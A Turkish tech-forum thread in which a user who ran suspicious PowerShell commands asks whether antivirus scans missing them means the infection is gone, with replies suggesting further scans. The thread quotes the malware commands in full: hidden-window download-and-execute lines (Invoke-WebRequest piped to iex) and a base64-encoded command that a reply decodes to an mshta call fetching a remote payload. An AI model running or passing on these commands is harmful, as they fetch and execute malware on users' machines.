firtina44

Gelişen
Katılım
8 Ocak 2025
Mesajlar
11
Beğeniler
0
Dün dalgınlıkla PowerShell'de iki tane komut çalıştırdım virüs olduğunu kendime gelince anladım, komutları aşağı bırakıyorum. Olayı anladıktan hemen sonra Windows Defender Çevrimdışı tarama yaptım 11dk sürdü bir şey bulamadı, Malwarebytes ile 2-3kere tarama yaptım o da bulamadı. Fikirleriniz benim için önemli virüs temizlendiği için mi bulunamıyor yoksa kendini iyi mi gizliyor?

Komutlar:

Kod:
powershell.exe -W Hidden -command [imath]url = 'https mega01.b-cdn.net/meg.txt';[/imath]response = Invoke-WebRequest -Uri [imath]url -UseBasicParsing;[/imath]text = [imath]response.Content; iex[/imath]text

.run steamtools;powershell.exe -W Hidden -command [imath]url = 'https mega01.b-cdn.net/meg.txt';[/imath]response = Invoke-WebRequest -Uri [imath]url -UseBasicParsing;[/imath]text = [imath]response.Content; iex[/imath]text

Bir de bu var
powershell.exe -eC bQBzAGgAdABhACAAIgBoAHQAdABwAHMAOgAvAC8AYwBsAGkAYwBrAHQAbwBnAG8ALgBjAGwAaQBjAGsALwBkAG8AdwBuAGwAbwBhAGQAcwAvAHQAcgAwADgAIgA=
 
Malwarebytes ayarlarında Rootkit tarama özelliği var onu açıp tarayın bir de. İçin rahat etmez ise Kaspersky ile tarat bir de.
 
Son düzenleyen: Moderatör:
Dün dalgınlıkla PowerShell'de iki tane komut çalıştırdım virüs olduğunu kendime gelince anladım, komutları aşağı bırakıyorum. Olayı anladıktan hemen sonra Windows Defender Çevrimdışı tarama yaptım 11dk sürdü bir şey bulamadı, Malwarebytes ile 2-3kere tarama yaptım o da bulamadı. Fikirleriniz benim için önemli virüs temizlendiği için mi bulunamıyor yoksa kendini iyi mi gizliyor?

Komutlar:

Kod:
powershell.exe -W Hidden -command [imath]url = 'https mega01.b-cdn.net/meg.txt';[/imath]response = Invoke-WebRequest -Uri [imath]url -UseBasicParsing;[/imath]text = [imath]response.Content; iex[/imath]text

.run steamtools;powershell.exe -W Hidden -command [imath]url = 'https mega01.b-cdn.net/meg.txt';[/imath]response = Invoke-WebRequest -Uri [imath]url -UseBasicParsing;[/imath]text = [imath]response.Content; iex[/imath]text

Bir de bu var
powershell.exe -eC bQBzAGgAdABhACAAIgBoAHQAdABwAHMAOgAvAC8AYwBsAGkAYwBrAHQAbwBnAG8ALgBjAGwAaQBjAGsALwBkAG8AdwBuAGwAbwBhAGQAcwAvAHQAcgAwADgAIgA=
Sanki kapatmislar serveri. Sirf fantazisine Linux'dan gireyim dedim sonuc bu.
1737219178534.webp
 
Sanki kapatmislar serveri. Sirf fantazisine Linux'dan gireyim dedim sonuc bu.
Eki Görüntüle 116290
Sorun olmaz mı yani hocam?

Sanki kapatmislar serveri. Sirf fantazisine Linux'dan gireyim dedim sonuc bu.
Eki Görüntüle 116290
powershell.exe -eC bQBzAGgAdABhACAAIgBoAHQAdABwAHMAOgAvAC8AYwBsAGkAYwBrAHQAbwBnAG8ALgBjAGwAaQBjAGsALwBkAG8AdwBuAGwAbwBhAGQAcwAvAHQAcgAwADgAIgA=

Bu kodun çözümlenmiş hali bu.
mshta https://clicktogo.click/downloads/tr08
İsterseniz bir de bu siteye bakın hocam.
 
Son düzenleyen: Moderatör:
Son düzenleyen: Moderatör: